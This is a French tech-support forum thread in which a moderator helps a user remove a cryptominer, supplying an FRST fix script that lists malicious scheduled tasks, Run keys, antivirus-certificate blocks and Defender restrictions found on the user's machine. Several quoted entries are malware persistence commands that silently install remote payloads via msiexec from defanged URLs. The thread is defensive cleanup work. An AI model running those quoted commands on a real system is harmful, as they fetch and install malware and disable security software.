J'aimerais enlever un mineur de mon ordinateur

michelu -  
Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   -
Bonjour,
j'ai besoin d'aide pour enlever de mon ordinateur ce qui me semble être un mineur ( il me prend 95% de mon processeur ) j'ai fais une analyse avec le programme FRST si quelqu'un veut bien y jeter un oeil

==shortcut== https://pjjoint.malekal.com/files.php?id=20180204_v10u12y9g12e13
---------------------------------------------------------------------------------------
==FRST== https://pjjoint.malekal.com/files.php?id=FRST_20180204_e15y9x118n11
----------------------------------------------------------------------------------------
==ADDITIONS== https://pjjoint.malekal.com/files.php?id=20180204_e11v8c8n9u7

merci

2 réponses

  1. jeanbern Messages postés 13740 Date d'inscription   Statut Contributeur Dernière intervention   5 136
     
    Salut,

    je remets tes liens pour l'ouverture:

    SHORTCUT

    FRST

    ADDITIONS

    0
  2. Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 712
     
    Salut,

    Tu as des programmes qui ont été installés à l'achat de l'ordinateur ou installés par la suite et qui sont pas forcément utiles.
    Ils encombrent Windows et peuvent le ralentir.
    Tu peux donc les désinstaller.
    Vas dans le Panneau de configuration
    puis programmes et fonctionnalités.
    Désinstalle :

    CCleaner
    Cyberlink
    McAfee Online Backup


    PS : CCleaner n'est pas vraiment utile, même si on le recommande de partout.
    Désactive la surveillance de CCleaner, inutile, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/

    Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
    Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
    Le bloc-note va s'ouvrir, copie/colle ceci.

    CreateRestorePoint:
    CloseProcesses:
    Task: {4A8E8688-792B-4D13-A142-F375D215FD4B} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== ATTENTION

    Task: {12394F8E-2222-41B4-A9A0-952FA22D3B87} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
    Task: {15EE2376-A619-44A6-AAB4-77203548764C} - System32\Tasks\Plejuphaniling => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST1000LM024XHN-M101MBB_S2Y9J9AD909011&v=201734 /q <==== ATTENTION
    Task: {28DA8FD5-0CA6-42EA-8321-6ED98CA8A722} - System32\Tasks\DXdnoft Virwool => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\DXdnoft Virwool\DXdnoft Virwool.dll",awNdncUgOCnQ <==== ATTENTION
    Task: {41974624-013E-480E-A4BE-9E46EDA3D67A} - System32\Tasks\Express Files Updater => C:\Program Files (x86)\ExpressFiles\EFupdater.exe [2017-08-14] (hxxp://www.express-files.com/) <==== ATTENTION
    Task: {4A8E8688-792B-4D13-A142-F375D215FD4B} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== ATTENTION
    Task: {4B71DD48-EACA-4841-A946-A078EF9922DA} - System32\Tasks\wincore => C:\WINDOWS\Windows\ProgramData\wincore.exe [2017-12-05] () <==== ATTENTION
    ask: {5CE1BFFB-6444-41E3-97A5-76C44C25E4EA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier <==== ATTENTION
    Task: {63F6A8A3-ECC5-43CA-BC86-0DEBBE2CB8DC} - System32\Tasks\SessionAgent => C:\windows\sysde32.exe [2017-09-24] ()
    Task: {7A1F1CA5-3C5E-4077-BF59-001454909677} - System32\Tasks\{5DC18CEC-A5D6-48E3-AF2E-0B0465691F15} => C:\WINDOWS\Windows\ProgramData\svchost.exe <==== ATTENTION
    Task: {83AAF366-AFFC-4277-B27B-C132996EB74F} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe <==== ATTENTION
    Task: {85DB64C9-8694-420B-89BD-0368E38E6ABC} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves) <==== ATTENTION
    Task: {ACEE87DD-DF12-4C27-8F68-FD8254E7012E} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION
    Task: {CA53239F-EB0A-40B2-990A-1398BEE3EC3E} - System32\Tasks\{47791521-7C5C-4DFE-B693-BF6444ED018B} => rundll32.exe "C:\Users\MSI\AppData\Local\Microsoft\Common Files\cache.dat",StaticCache
    Task: {D5E0BB54-5CF8-49CB-92B2-CBAD05330A26} - System32\Tasks\ShadowsocksS => C:\Applications\Service.exe [2017-09-17] (TODO: <Company name>)
    Task: {DDDDFB51-191A-4A2F-BF8F-D29504D8EB71} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION
    Task: {E267D716-03E2-44F8-9E5E-B124852F1927} - System32\Tasks\Microsoft System Optimizer => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Microsoft System Optimizer\Microsoft System Optimizer.dll",mulfsyrcTvru <==== ATTENTION
    Task: C:\WINDOWS\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\WINDOWS\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\WINDOWS\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\WINDOWS\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
    HKLM\...\RunOnce: [MICHEL] => C:\WINDOWS\TEMP\gDFC2.tmp.exe [206848 2018-02-02] () <==== ATTENTION
    HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
    HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
    HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
    HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
    HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
    HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
    HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
    HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
    HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
    HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
    HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
    HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
    HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
    HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
    HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
    HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
    HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
    HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
    HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
    HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
    HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
    HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
    HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
    HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
    HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
    HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
    HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
    HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
    HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
    HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
    HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
    HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
    HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
    HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
    HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
    HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
    HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
    HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
    HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
    HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
    HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
    HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
    HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
    HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
    HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
    HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Run: [background_fault] => C:\Users\MSI\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-26] (AVAST Software) <==== ATTENTION
    HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Run: [Microsoft Update] => C:\Users\MSI\AppData\Local\Microsoft Windows\svchost.exe [349184 2017-06-13] (Microsoft Corporation) <==== ATTENTION
    HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Run: [Microsoft Viewer Monitor Manager] => C:\Users\MSI\AppData\Local\Microsoft Windows\taskhost.exe [309248 2017-06-21] (Microsoft Corporation) <==== ATTENTION
    HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Run: [msiql] => C:\Users\MSI\AppData\Local\Temp\00011815\msiql.exe /RUNNING <==== ATTENTION
    HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Run: [84327] => C:\Users\MSI\AppData\Roaming\ov2023ydghe\yxhziw3fk24.exe /VERYSILENT
    HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Run: [5RVL2Q132WIP9AS] => C:\Program Files\G1YG0O417L\G1YG0O417.exe
    HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8dRWkyFUUdNYEcRTY5NdF8NWwxNTVLMdZWOTq5OTk8Fq== /q <==== ATTENTION [Pays US - 104.28.16.238]
    HKU\S-1-5-18\...\RunOnce: [zZHILNIspz] => C:\WINDOWS\system32\config\SYSTEM~1\AppData\Local\BJIHIW~1\rdsvc.exe
    HKU\S-1-5-18\...\RunOnce: [KyhuRAcNvF] => C:\WINDOWS\system32\config\SYSTEM~1\AppData\Local\YXVHVH~1\win32k.exe
    HKLM\...\Providers\epb6drvn: C:\Program Files (x86)\Shibusypercight Update\local64spl.dll [305152 2017-03-04] () <==== ATTENTION
    IFEO\taskmgr.exe: [Debugger]
    ShellExecuteHooks: Pas de nom - {CAE9E212-FD94-11E6-9EE3-64006A5CFC23} - -> Pas de fichier
    ShellExecuteHooks: Pas de nom - {5F51FFFE-7463-4220-B711-E5B9ACB8EDFE} - C:\Users\MSI\AppData\Roaming\tmp546.dat [2307072 2017-10-25] ()
    S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) <==== ATTENTION
    2017-11-01 09:26 - 2017-10-25 18:26 - 002307072 ___SH () C:\Users\MSI\AppData\Roaming\tmp546.dat
    Hosts:
    EmptyTemp:
    RemoveProxy:
    Reboot:


    Enregistre le contenu par le menu fichier puis enregistrer.

    Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
    Un redémarrage sera peut-être nécessaire et automatique.
    Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

    Redémarre l'ordinateur.

    2°)
    Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

    3°)
    Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

    4°)
    Vois ce que cela donne et si des améliorations ont eu lieu.
    Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
    Refais un scan FRST et donne les nouveaux rapports via pjjoint.

    0